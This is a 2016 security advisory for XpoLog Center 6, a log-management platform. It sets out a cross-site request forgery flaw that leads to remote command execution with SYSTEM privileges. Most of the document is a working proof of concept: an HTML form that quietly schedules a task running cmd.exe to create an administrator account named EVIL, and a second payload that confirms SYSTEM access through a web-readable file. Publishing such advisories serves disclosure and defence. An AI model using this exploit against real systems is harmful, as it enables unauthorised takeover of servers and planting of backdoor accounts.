XpoLog Center 6 Cross Site Request Forgery
Posted on 05 July 2016
XpoLog Center V6 CSRF Remote Command Execution Vendor: XpoLog LTD Product web page: http://www.xpolog.com Affected version: 6.4469 6.4254 6.4252 6.4250 6.4237 6.4235 5.4018 Summary: Applications Log Analysis and Management Platform. Desc: XpoLog suffers from arbitrary command execution. Attackers can exploit this issue using the task tool feature and adding a command with respected arguments to given binary for execution. In combination with the CSRF an attacker can execute system commands with SYSTEM privileges. Tested on: Apache-Coyote/1.1 Microsoft Windows Server 2012 Microsoft Windows 7 Professional SP1 EN 64bit Java/1.7.0_45 Java/1.8.0.91 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5335 Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5335.php 14.06.2016 -- exePath = "C:\windows\system32\cmd.exe" exeArgs = "/C net user EVIL pass123 /add & net localgroup Administrators EVIL /add" <html> <body> <form action="http://10.0.0.17:30303/logeye/tasks/xpotaskDefinitionAction.jsp?" method="POST"> <input type="hidden" name="" value="" /> <input type="hidden" name="csrfToken" value="NoToken" /> <input type="hidden" name="taskId" value="1465930398522" /> <input type="hidden" name="taskType" value="exe" /> <input type="hidden" name="name" value="CCMMDD" /> <input type="hidden" name="description" value="ZSL" /> <input type="hidden" name="IsSsh" value="false" /> <input type="hidden" name="exePath" value=""c:\windows\system32\cmd.exe"" /> <input type="hidden" name="exeArgs" value=""/C net user EVIL pass123 /add & net localgroup Administrators EVIL /add"" /> <input type="hidden" name="exeEnvVar" value="" /> <input type="hidden" name="exeWorkDir" value="" /> <input type="hidden" name="exeOutputTargetFile" value="" /> <input type="hidden" name="NameXpoTaskSched" value="taskId_1465930366962" /> <input type="hidden" name="IdXpoTaskSched" value="taskId_1465930366962" /> <input type="hidden" name="actionIdXpoTaskSched" value="0" /> <input type="hidden" name="StateXpoTaskSched" value="1" /> <input type="hidden" name="schedulerSuffix" value="XpoTaskSched" /> <input type="hidden" name="trigTypeXpoTaskSched" value="cron" /> <input type="hidden" name="minutesXpoTaskSched" value="0" /> <input type="hidden" name="minutesEndXpoTaskSched" value="0" /> <input type="hidden" name="numOfExecutionsXpoTaskSched" value="0" /> <input type="hidden" name="frequencyXpoTaskSched" value="daily" /> <input type="hidden" name="DayInMonthXpoTaskSched" value="all" /> <input type="hidden" name="dailyTypeXpoTaskSched" value="repeat" /> <input type="hidden" name="dailyRepeatValueXpoTaskSched" value="1" /> <input type="hidden" name="dailyRepeatTypeXpoTaskSched" value="second" /> <input type="hidden" name="hoursXpoTaskSched" value="0" /> <input type="hidden" name="hoursEndXpoTaskSched" value="0" /> <input type="hidden" name="hoursOnce0XpoTaskSched" value="-1" /> <input type="hidden" name="minutesOnce0XpoTaskSched" value="-1" /> <input type="hidden" name="secondsOnce0XpoTaskSched" value="-1" /> <input type="hidden" name="jobPriority" value="-1" /> <input type="hidden" name="ajaxTimestamp" value="1465930905166" /> <input type="submit" value="Submit" /> </form> </body> </html> -- exePath = "C:\windows\system32\cmd.exe" exeArgs = "/C whoami > c:\Progra~1\XpoLogCenter6\defaultroot\logeye\testingus.txt" GET http://10.0.0.17:30303/logeye/testingus.txt Response: nt authoritysystem
